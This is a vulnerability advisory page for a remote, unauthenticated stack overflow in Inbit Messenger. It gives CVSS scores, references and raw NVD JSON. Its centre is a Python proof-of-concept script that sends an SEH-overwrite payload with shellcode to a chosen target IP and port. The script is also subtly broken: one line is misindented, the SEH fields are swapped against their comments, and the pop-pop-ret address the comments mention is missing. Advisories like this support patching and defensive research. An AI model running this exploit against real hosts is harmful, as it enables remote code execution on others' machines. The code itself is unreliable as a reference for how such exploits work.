CVE-2023-54330

Description

Inbit Messenger versions 4.6.0 to 4.9.0 contain a remote stack-based buffer overflow vulnerability that allows unauthenticated attackers to execute arbitrary code by sending malformed network packets. Attackers can craft a specially designed payload targeting the messenger's network handler to overwrite the Structured Exception Handler (SEH) and execute shellcode on vulnerable Windows systems.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:inbit:inbit_messenger:*:*:*:*:*:*:*:* - VULNERABLE

Inbit Messenger >= 4.6.0

Inbit Messenger <= 4.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import sys

def create_exploit_payload():
    """
    Generate exploit payload for CVE-2023-54330
    Inbit Messenger SEH Overflow
    """
    # Target port (commonly used by Inbit Messenger)
    target_port = 5555
    
    # Generate padding to reach SEH overwrite offset
    # Adjust offset based on specific version
    offset_to_seh = 1008
    padding = b'A' * offset_to_seh
    
    # SEH record overwrite
    # p/p/r - JMP to shellcode (near jump)
   seh_handler = b'\xeb\x06\x90\x90'  # JMP +6
    
    # Next SEH record (4 bytes) - points to our shellcode
    next_seh = b'\x90\x90\x41\x42'
    
    # Shellcode - calc.exe or reverse shell
    # Example: Execute calc.exe (Windows x86)
    shellcode = (
        b'\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3'
    )
    
    # Fill remaining space with NOPs
    nops = b'\x90' * (200 - len(shellcode))
    
    payload = padding + next_seh + seh_handler + nops + shellcode
    
    return payload

def exploit(target_ip, target_port=5555):
    """
    Send exploit payload to target
    """
    payload = create_exploit_payload()
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        print(f'[*] Connected to {target_ip}:{target_port}')
        print(f'[*] Sending payload ({len(payload)} bytes)...')
        sock.send(payload)
        print('[+] Payload sent successfully')
        sock.close()
        return True
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_ip> [port]')
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 5555
    
    print(f'[*] Exploiting CVE-2023-54330 - Inbit Messenger SEH Overflow')
    exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-54330
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-54330
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-54330/
[4] VulDB https://vuldb.com/cve/CVE-2023-54330
[5] https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md
[6] https://web.archive.org/web/20200122082432/https://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html
[7] https://www.exploit-db.com/exploits/51126
[8] https://www.vulncheck.com/advisories/inbit-messenger-unauthenticated-remote-seh-overflow
[9] https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-54330", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:00.163", "lastModified": "2026-01-30T15:48:11.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inbit Messenger versions 4.6.0 to 4.9.0 contain a remote stack-based buffer overflow vulnerability that allows unauthenticated attackers to execute arbitrary code by sending malformed network packets. Attackers can craft a specially designed payload targeting the messenger's network handler to overwrite the Structured Exception Handler (SEH) and execute shellcode on vulnerable Windows systems."}, {"lang": "es", "value": "Las versiones 4.6.0 a 4.9.0 de Inbit Messenger contienen una vulnerabilidad remota de desbordamiento de búfer basado en pila que permite a atacantes no autenticados ejecutar código arbitrario enviando paquetes de red malformados. Los atacantes pueden crear una carga útil especialmente diseñada dirigida al controlador de red del mensajero para sobrescribir el Structured Exception Handler (SEH) y ejecutar shellcode en sistemas Windows vulnerables."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inbit:inbit_messenger:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndIncluding": "4.9.0", "matchCriteriaId": "A055F099-1772-4ECD-BD63-2067401A7891"}]}]}], "references": [{"url": "https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://web.archive.org/web/20200122082432/https://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51126", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/inbit-messenger-unauthenticated-remote-seh-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}